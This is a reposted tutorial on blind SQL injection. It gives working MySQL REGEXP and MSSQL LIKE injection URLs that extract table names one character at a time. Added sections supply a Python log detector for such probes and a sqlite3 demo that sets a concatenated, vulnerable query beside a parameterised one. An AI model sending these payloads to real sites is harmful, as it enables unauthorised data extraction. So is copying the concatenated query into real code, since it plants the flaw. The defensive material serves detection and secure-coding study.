Reposted from: http://hi.baidu.com/zh2089/item/819d2373d7834728d7a89c9e
Hray's note: Injection has been discussed endlessly, but how many people are really proficient at it? This is an article on blind injection, reposted here for my own convenience and in the hope that it helps others too.
The previous post already covered time-based blind injection; using regular expressions to guess values blindly can save a great deal of time:
-----------------------------------------MYSQL 5+-----------------------------------------
As is well known, in MySQL 5+ all database names, table names and column names are stored in the INFORMATION_SCHEMA database. The attack proceeds as follows:
1. Determine whether the first character of the first table name lies in the range a-z. Here Blind_sqli is the database name, assumed to be already known.
Note: ^[a-z] in a regular expression means that the first character of the string lies within the range a-z (MySQL's REGEXP is case-insensitive by default, so upper-case letters match as well).
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE table_schema="Blind_sqli" AND table_name REGEXP '^[a-z]' LIMIT 0,1)/*
2. Determine whether the first character lies in the range a-n
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE table_schema="Blind_sqli" AND table_name REGEXP '^[a-n]' LIMIT 0,1)/*
3. Determine that the character is n
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE table_schema="Blind_sqli" AND table_name REGEXP '^n' LIMIT 0,1)/*
4. Then extend the expression one character at a time, in this manner:
'^n[a-z]', '^ne[a-z]', '^new[a-z]', '^news[a-z]' → FALSE
At this point the table name is news. To verify it, the regular expression would be '^news$', but that is not strictly necessary: checking table_name = 'news' directly works just as well.
5. Next, guess the remaining tables. You only need to change the LIMIT clause, for example to LIMIT 2,1, to guess the next table in the same way.
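From the defender's side, the procedure above has a recognisable shape: a burst of requests from one client in which the same query parameter carries `information_schema` plus a `REGEXP` (or, for MSSQL, `LIKE`) pattern that changes by one character each time. The following detector is an added example, not code from the original post; it parses constructed access-log lines (the log lines, IP addresses, timestamps and response sizes are all made up for the example), URL-decodes each query parameter, flags values that match that shape, and groups hits per client so that a guessing sequence stands out from a single stray request.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (combined-log style, shortened); not real traffic.
# 10.0.0.7 sends three of the MySQL REGEXP probes described above, 10.0.0.9 sends one
# MSSQL LIKE probe, and 10.0.0.5 sends ordinary requests (one value happens to contain
# the word "regexp", to show that the word alone is not flagged). The differing response
# size on the third probe (512 vs 12) stands in for the true/false oracle the attacker reads.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512
10.0.0.7 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?id=1%20and%201=(SELECT%201%20FROM%20information_schema.tables%20WHERE%20table_schema=%22Blind_sqli%22%20and%20table_name%20REGEXP%20%27%5E%5Ba-z%5D%27%20LIMIT%200,1)/* HTTP/1.1" 200 512
10.0.0.7 - - [10/Oct/2023:13:55:41 +0000] "GET /index.php?id=1%20and%201=(SELECT%201%20FROM%20information_schema.tables%20WHERE%20table_schema=%22Blind_sqli%22%20and%20table_name%20REGEXP%20%27%5E%5Ba-n%5D%27%20LIMIT%200,1)/* HTTP/1.1" 200 512
10.0.0.7 - - [10/Oct/2023:13:55:42 +0000] "GET /index.php?id=1%20and%201=(SELECT%201%20FROM%20information_schema.tables%20WHERE%20table_schema=%22Blind_sqli%22%20and%20table_name%20REGEXP%20%27%5En%27%20LIMIT%200,1)/* HTTP/1.1" 200 12
10.0.0.9 - - [10/Oct/2023:13:56:01 +0000] "GET /default.asp?id=1%20and%201=(select%20TOP%201%201%20from%20information_schema.tables%20WHERE%20table_schema=%27blind_sqli%27%20and%20table_name%20like%20%27[a-z]%25%27) HTTP/1.1" 200 300
10.0.0.5 - - [10/Oct/2023:13:56:10 +0000] "GET /index.php?id=news%20regexp HTTP/1.1" 200 512
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Strong signal: a catalogue table referenced together with REGEXP/LIKE and a quoted
# pattern that uses an anchor, character class or wildcard.
PROBE_RE = re.compile(
    r"\binformation_schema\.(?:tables|columns)\b.*?\b(?:regexp|like)\b\s*'[^']*[\[\^%_]",
    re.IGNORECASE,
)
# Weaker signal: a boolean condition built from a scalar subquery ("and 1=(select ...").
BOOL_RE = re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\(\s*select\b", re.IGNORECASE)
# Extracts the guessed pattern so an analyst can see the sequence of guesses.
PATTERN_RE = re.compile(r"\b(?:regexp|like)\s*'([^']*)'", re.IGNORECASE)


def parse_line(line):
    """Split one access-log line into its fields; return None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def decode_params(target):
    """URL-decode the query string of a request target into (name, value) pairs."""
    return parse_qsl(urlsplit(target).query, keep_blank_values=True)


def classify(value):
    """Return a reason string if a decoded parameter value looks like a probe, else None."""
    if PROBE_RE.search(value):
        return "information_schema REGEXP/LIKE probe"
    if BOOL_RE.search(value):
        return "boolean subquery condition"
    return None


def scan(log_text):
    """Return (hits, per_ip): flagged requests, and how many each client sent."""
    hits, per_ip = [], defaultdict(int)
    for raw in log_text.splitlines():
        entry = parse_line(raw)
        if entry is None:
            continue
        for name, value in decode_params(entry["target"]):
            reason = classify(value)
            if reason is None:
                continue
            pattern = PATTERN_RE.search(value)
            hits.append({
                "ip": entry["ip"], "ts": entry["ts"], "param": name,
                "status": entry["status"], "reason": reason,
                "pattern": pattern.group(1) if pattern else None,
            })
            per_ip[entry["ip"]] += 1
    return hits, dict(per_ip)


def bursts(hits, min_probes=2):
    """Clients with at least min_probes flagged requests: a guessing sequence, not a one-off."""
    counts = defaultdict(int)
    for h in hits:
        counts[h["ip"]] += 1
    return sorted(ip for ip, n in counts.items() if n >= min_probes)


if __name__ == "__main__":
    found, by_ip = scan(SAMPLE_LOG)
    for h in found:
        print(f'{h["ts"]} {h["ip"]} {h["param"]}={h["pattern"]!r} ({h["reason"]})')
    print("guessing sequences from:", bursts(found))
```

The per-character guesses are the part worth alerting on: a single request containing `information_schema` may be a scanner or a false positive, but a run of them from one client whose quoted pattern grows by one character each time is the guessing loop from the steps above in progress. Decode before matching; the probes arrive percent-encoded, so a regex applied to the raw log line would miss `%5E%5Ba-z%5D`.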
-----------------------------------------------MSSQL---------------------------------------------------
What MSSQL provides is not a standard regular expression: the pattern is used with the LIKE keyword, which supports [ ] character ranges and the % and _ wildcards.
default.asp?id=1 and 1=(SELECT TOP 1 1 FROM information_schema.tables WHERE table_schema='blind_sqli' AND table_name LIKE '[a-z]%')
Note that "SELECT TOP 1 1" in this query is TOP 1 followed by the literal 1; do not misread it.
To query the other table names, you cannot use LIMIT x,1 as in MySQL; the only option is table_name NOT IN (SELECT TOP x table_name FROM information_schema.tables), meaning the table name is not among the first x rows. In effect this queries row x+1.
For example, to query the table name in the second row:
default.asp?id=1 and 1=(SELECT TOP 1 1 FROM information_schema.tables WHERE table_schema='blind_sqli' AND table_name NOT IN (SELECT TOP 1 table_name FROM information_schema.tables) AND table_name LIKE '[a-z]%')
The sequence of expressions:
'n[a-z]%', 'ne[a-z]%', 'new[a-z]%', 'news[a-z]%'
The result still has to be checked after 'news[a-z]%' has been reached, because % stands for 0 to n characters whereas _ stands for exactly one character. So, to confirm whether any further characters follow, use the following expressions:
'news%' → TRUE, 'news_' → FALSE
Column names and values can be obtained in the same way; this is not described in further detail here.
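Every query on this page, MySQL and MSSQL alike, works for the same reason: the `id` parameter is pasted into the SQL text, so the appended `and 1=(SELECT ...)` becomes part of the statement and the page's true/false behaviour becomes an oracle. The following is an added example, not code from the original post, that shows the vulnerable lookup beside its hardened form using Python's built-in sqlite3 against a constructed in-memory database. The probe strings are translated to SQLite's own catalogue (`sqlite_master` in place of `information_schema.tables`; SQLite's LIKE has no `[a-z]` class, so a plain `n%` prefix is used); the table, rows and function names are all assumptions made for the example.

```python
import sqlite3


def make_db():
    """Constructed in-memory database standing in for the site's backend (example data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO news VALUES (1, 'first post'), (2, 'second post');
    """)
    return conn


def lookup_vulnerable(conn, id_str):
    """The pattern behind index.php?id=...: the raw parameter is concatenated into the SQL
    text, so a boolean subquery appended to it is evaluated by the database and the
    presence or absence of the result row leaks one bit per request."""
    sql = "SELECT title FROM news WHERE id = " + id_str
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, id_str):
    """Hardened form: validate the type first, then bind the value as a parameter.
    The driver never splices a bound value into the SQL text, so even a string
    parameter (a name, a search term) would be compared as data, not parsed as SQL."""
    try:
        ident = int(id_str)
    except ValueError:
        # Reject and log; a non-integer id is either a bug or a probe, never a valid request.
        return None
    rows = conn.execute("SELECT title FROM news WHERE id = ?", (ident,))
    return [row[0] for row in rows]


# Constructed probes in the style of the page, rewritten for SQLite's catalogue.
# The first asks "does a table name start with n?" (true: 'news'), the second "with x?" (false).
PROBE_TRUE = "1 and 1=(SELECT 1 FROM sqlite_master WHERE type='table' AND name LIKE 'n%' LIMIT 1)"
PROBE_FALSE = "1 and 1=(SELECT 1 FROM sqlite_master WHERE type='table' AND name LIKE 'x%' LIMIT 1)"


def demo():
    """Run both lookups with a normal id and with the two probes; return the outcomes."""
    conn = make_db()
    return {
        "vulnerable/normal": lookup_vulnerable(conn, "1"),
        "vulnerable/probe_true": lookup_vulnerable(conn, PROBE_TRUE),   # row comes back: oracle says TRUE
        "vulnerable/probe_false": lookup_vulnerable(conn, PROBE_FALSE), # empty: oracle says FALSE
        "safe/normal": lookup_safe(conn, "1"),
        "safe/probe_true": lookup_safe(conn, PROBE_TRUE),               # rejected before any SQL runs
        "safe/probe_false": lookup_safe(conn, PROBE_FALSE),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result!r}")
```

The vulnerable lookup answers the two probes differently (a row versus no row), which is exactly the distinguishable response the guessing loop needs; the hardened lookup gives the same answer to both, so there is nothing to guess against. Type validation is the cheap first gate, but parameter binding is the actual fix, and it must be applied to every user-controlled value in every query, not only the integer ones.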
PS: Blind injection is laborious manual work, but once the principle is understood, capable programmers might consider implementing it as a tool.
Regular-expression attacks in blind SQL injection